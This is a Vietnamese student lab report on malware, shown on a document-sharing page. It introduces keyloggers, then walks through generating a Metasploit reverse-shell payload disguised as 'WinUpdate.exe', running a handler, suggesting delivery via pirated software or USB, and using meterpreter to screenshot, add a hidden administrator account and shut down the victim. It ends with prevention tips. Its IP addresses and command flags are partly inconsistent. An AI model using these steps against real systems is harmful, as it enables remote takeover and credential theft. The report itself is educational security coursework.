1. Trang chủ
  2. » Giáo Dục - Đào Tạo

Báo cáo lab 6 malware

15 1 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề Báo Cáo Lab 6: Malware
Tác giả Nguyễn Nhật Nguyên
Người hướng dẫn ThS. Huỳnh Nguyên Chính
Trường học Trường Đại Học Sư Phạm Kỹ Thuật TPHCM
Chuyên ngành Công Nghệ Thông Tin
Thể loại Báo Cáo
Năm xuất bản 2024
Thành phố TPHCM
Định dạng
Số trang 15
Dung lượng 854,54 KB

Nội dung

- Keylogger có thể được cài đặt trên máy tính theo nhiều cách khác nhau, bao gồm: + Tải xuống và cài đặt phần mềm từ nguồn không đáng tin cậy + Mở tệp hoặc liên kết độc hại + Bị tấn công

Trang 1

BỘ GIÁO DỤC VÀ ĐÀO TẠO TRƯỜNG ĐẠI HỌC SƯ PHẠM KỸ THUẬT TPHCM

KHOA: CÔNG NGHỆ THÔNG TIN

-oOo -BÁO CÁO

LAB 6: MALWARE

GVHD: THS.HUỲNH NGUYÊN CHÍNH

SVTH: NGUYỄN NHẬT NGUYÊN

MÃ SINH VIÊN: 22110384 HỌC KỲ: 1

TPHCM, Tháng 11 Năm 2024

Trang 2

Lab 6 Malware

1 Keylogger

1.1 Giới thiệu về Keylogger

- Keylogger là một phần mềm hoặc thiết bị phần cứng có khả năng ghi lại mọi phím được nhấn trên bàn phím Thông tin này sau đó có thể được sử dụng để đánh cắp mật khẩu, thông tin tài chính và các thông tin cá nhân nhạy cảm khác

- Keylogger có thể được cài đặt trên máy tính theo nhiều cách khác nhau, bao gồm:

+ Tải xuống và cài đặt phần mềm từ nguồn không đáng tin cậy

+ Mở tệp hoặc liên kết độc hại

+ Bị tấn công bởi phần mềm độc hại

- Keylogger có thể gây ra nhiều thiệt hại, bao gồm:

+ Đánh cắp thông tin cá nhân và tài chính

+ Lạm dụng tài khoản trực tuyến

+ Tấn công lừa đảo

1.2 Lập trình ra Keylogger đơn giản bằng ngôn ngữ Python

Ngôn ngữ Python

Gói Listener trong thư viện Pynput

Giải thích: Đoạn mã Python trên là một trình theo dõi bàn phím đơn giản Nó sử dụng thư viện pynput để lắng nghe các sự kiện bàn phím và gọi lại hàm anonymous() mỗi khi một phím được nhấn Hàm anonymous() kiểm tra xem phím được nhấn có phải là phím F12 hay không Nếu là vậy, hàm sẽ gọi raise SystemExit(0) để thoát khỏi chương trình Nếu không, hàm sẽ in ra tên của phím được nhấn lên màn hình và ghi vào file nội dung được nhấn Để

sử dụng trình theo dõi bàn phím này, chúng ta chỉ cần chạy nó và sau đó nhấn bất kỳ phím nào trên bàn phím Tên của phím được nhấn sẽ được in ra lên màn hình Nếu bạn nhấn phím F12, chương trình sẽ thoát

Trang 3

Kết quả sau khi chạy chương trình:

Vừa in ra ở console vừa ghi vào file

Trang 4

1.3 Một số chức năng khác của Keylogger

- Ngoài các chức năng chính là ghi lại toàn bộ bàn phím, hacker có thể tạo ra

keylogger có các chức năng hiện đại hơn như:

+ Ghi lại mọi phím được nhấn trên bàn phím, bao gồm cả phím tắt, phím chức năng

và phím mũi tên được định dạng theo chuẩn giúp hacker dễ đánh cắp thông tin

+ Lưu trữ thông tin đã ghi lại vào một tệp nhật ký hoặc gửi thông tin đó đến máy chủ

từ xa hoặc máy hacker

+ Có thể được sử dụng để đánh cắp mật khẩu, thông tin tài chính và các thông tin cá nhân nhạy cảm khác

+ Có thể được sử dụng để theo dõi hoạt động trực tuyến hay thói quen của người dùng

2 Malware (phần mềm độc lại)

2.1 Giới thiệu

Attacker sẽ phát tán các chương trình độc hại đến máy nạn nhân Khi máy nạn nhân

vô tình chạy chương trình độc hại của attacker thì attacker có thể điều khiển máy nạn nhân

2.2 Mục tiêu tấn công:

Usename/password các chương trình của mục tiêu

Lấy các tài liệu trên máy nạn nhân

Leo thang đặc quyền

Chạy các chương trình của Attacker

2.3 Công cụ sử dụng:

Metasploit

2.4 Thực hiện Lab

2.4.1 Chuẩn bị hệ thống

Tên Thiết bị Số lượng Ghi chú

PC Win 7

(192.168.74.135)

Backtrack 5 r3

(192.168.74.136) 1 Dùng cho Attacker

Lưu ý: Máy Windown 7 phải tắt tường lửa, các phần mềm diệt virus

Mô hình kết nối

Trang 5

2.4.2 Chuẩn bị Malware

Hack hệ thống: Sử dụng metasploit trong Kali

Bước 1: Kiểm tra IP của máy attacker bằng lệnh

$ ipconfig

(IP: 192.168.126.135)

Trang 6

Bước 2: Sử dụng phần mềm Metasploit tạo Malware

- Sử dụng quyền root của Kali linux

$ sudo su

Nhập mật khẩu Kali

- Sử dụng phần mềm Metasplot tạo ra virus có tên WinUpdate.exe

# msf>msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.74.136 LPORT=4444 X >/root/WinUpdate.exe

Giải thích: Lệnh trên trong Kali là một lệnh của Metasploit Framework - một công cụ bảo mật được sử dụng để kiểm tra và khai thác các lỗ hổng bảo mật Cụ thể, các tùy chọn được sử dụng trong lệnh này là:

p Windows/meterpreter/reverse_tcp: Chọn payload là meterpreter cho hệ điều hành Windows và thiết lập kết nối ngược trở lại (reverse connection) với máy chủ của bạn

LHOST=192.168.74.136: Thiết lập địa chỉ IP của máy attacker của bạn LPORT=4444: Thiết lập cổng mà mà máy attacker sẽ lắng nghe

f exe: Chọn định dạng tệp tin đầu ra là exe /var/WinUpdate.exe: Thiết lập đường dẫn và tên tệp tin đầu ra Lệnh này sẽ tạo ra một tệp tin thực thi trên hệ điều hành Windows có tên là

WinUpdate.exe tại đường dẫn /var/ trên máy tính của attacker Tệp tin này sẽ kết nối đến máy chủ của bạn (được chỉ định bởi LHOST=192.168.74.136) và lắng nghe trên cổng 4444 (được chỉ định bởi LPORT=4444) Khi tệp tin này được chạy trên máy tính mục tiêu, nó sẽ kết nối đến máy attacker và cho phép máy attacker kiểm soát máy tính đó từ xa

Trang 7

Kiểm tra virus đã được tạo hay chưa

Mở terminal mới

$ cd /var

$ ls

Thấy tệp tin chứa virus WinUpdate.exe đã được tạo thành công

Bước 3: Cấu hình Metasploit máy attacker để khai thác máy nạn nhân

Mở Metasploit Framework

# msfconsole

Lệnh này khởi động giao diện dòng lệnh của Metasploit Framework, cho phép bạn truy cập và làm việc với các module và tùy chọn của nó

Trang 8

Cấu hình

use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.126.135

set LPORT 4444 show options exploit

Giải thích lệnh:

+ use exploit/multi/handler: Chọn module handler trong Metasploit Framework

+ set payload windows/meterpreter/reverse_tcp: Thiết lập payload là meterpreter cho hệ điều hành Windows và thiết lập kết nối ngược trở lại (reverse connection) với máy attacker

+ set LHOST 192.168.2.136: Thiết lập địa chỉ IP của máy attacker + set LPORT 4444: Thiết lập cổng mà máy attacker sẽ lắng nghe trên + show options: Hiển thị danh sách các tùy chọn mà chúng ta vừa thiết lập phía trên

+ exploit: Khởi động module và bắt đầu lắng nghe kết nối từ máy nạn nhân

Sau khi khởi động module thì nó sẽ lắng nghe kết nối từ máy nạn nhân nếu máy nạn nhân mở virus WindowsUpdate.exe thì máy attacker sẽ bắt được kết nối

Trang 9

Bước 4: Thực hiện phát tán virus đến máy nạn nhân

Virus WindowsUpdate.exe có thể phát tán bằng nhiều cách vào máy nạn nhân Ví dụ như chèn vào phần mềm lậu, gửi qua email, tin nhắn hoặc truyền file từ usb sang máy nạn nhân,… Khi nạn nhân thấy file WindowsUpdate.exe thì nạn nhân sẽ khó phát hiện, không đề phòng và nghĩ chỉ là file cập nhật của Windows nên chạy bình thường Khi đó thì máy attacker sẽ kết nối đến máy nạn nhân, máy attacker đã có quyền kiểm soát máy nạn nhân

Giả sử ở đây Windows 7 ( máy nạn nhân) đã tải file virus WinUpdate.exe

Bước 5: Khai thác máy nạn nhân

Khi máy nạn nhân mở file virus WindowUpdate.exe

Trang 10

Thì máy attacker sẽ kết nối, và máy attacker đã có quyền kiểm soát máy nạn nhân

Bây giờ máy Attacker có thể khai thác thông tin nạn nhân Nhập lệnh meterpreter >

help để hiển thị tất cả câu lệnh có thể thao tác lên máy nạn nhân Ví dụ như: chụp ảnh màn

hình, quay bằng webcam, tắt nguồn, hiển thị thông tin hệ thống, tạo file, …

Trang 11

Hiển thị thông tin hệ thống

Attacker có thể xem thông tin hệ thống máy nạn nhân bằng lệnh

meterpreter > sysinfo

Xem các tiến trình đang chạy bằng lệnh

meterpreter > ps

Trang 12

Chụp ảnh màn hình

Giả sử máy nạn nhân đang duyệt web, attacker có thể chụp ảnh màn hình và lấy thông tin quan trọng như tài khoản cá nhân, mật khẩu, hình ảnh,… Máy attacker có thể chụp ảnh màn hình máy nạn nhân bằng lệnh

meterpreter > screenshot

Tạo thư mục trên máy nạn nhân bằng lệnh

meterpreter > mkdir C:/hacker

Máy attacker

Trang 13

Máy nạn nhân

Tạo user hacker với quyền administrators

meterpreter> shell net user hacker abc123 /add net localgroup administrators hacker /add

Tắt nguồn máy nạn nhân

Attacker có thể tắt nguồn máy nạn nhân bằng lệnh

meterpreter > shutdown

Trang 14

Máy attacker

Máy nạn nhân

Ngoài ra còn nhiều thứ mà máy attacker có thể làm với máy nạn nhân

3 Dấu hiệu và cách phòng chống các phần mềm độc hại

3.1 Dấu hiệu máy tính của bạn có thể bị nhiễm phần mềm độc hại

- Máy tính chạy chậm

- Máy tính bị khởi động lại hoặc tắt đột ngột

- Bạn nhận được thông báo lỗi lạ

- Bạn thấy các cửa sổ bật lên quảng cáo không mong muốn

- Bạn thấy các chương trình mới được cài đặt mà bạn không nhớ đã cài đặt

- Phần mềm quét virus phát hiện nhưng phần mềm không đáng tin cậy

Trang 15

3.2 Một số cách phòng chống phần mềm độc hại

- Cài đặt phần mềm chống mã độc uy tín: Đây là cách phòng chống phần mềm độc hại hiệu quả nhất Phần mềm chống mã độc sẽ giúp phát hiện và loại bỏ phần mềm độc hại khỏi máy tính của bạn

- Cập nhật phần mềm thường xuyên: Các nhà sản xuất phần mềm thường xuyên phát hành các bản cập nhật để vá các lỗ hổng bảo mật Do đó, việc cập nhật phần mềm thường xuyên sẽ giúp máy tính của bạn được bảo vệ tốt hơn khỏi phần mềm độc hại

- Cẩn thận khi tải xuống và cài đặt phần mềm: Chỉ tải xuống và cài đặt phần mềm từ các nguồn đáng tin cậy Tránh tải xuống phần mềm miễn phí từ các trang web không rõ nguồn gốc

- Sử dụng mật khẩu mạnh: Mật khẩu mạnh sẽ giúp bảo vệ tài khoản của bạn khỏi bị tấn công Hãy sử dụng mật khẩu có ít nhất 8 ký tự, bao gồm chữ cái, số và ký tự đặc biệt

- Sao lưu dữ liệu thường xuyên: Sao lưu dữ liệu thường xuyên sẽ giúp bạn khôi phục

dữ liệu nếu bị mất hoặc bị hỏng do phần mềm độc hại

Ngày đăng: 22/11/2024, 11:21

w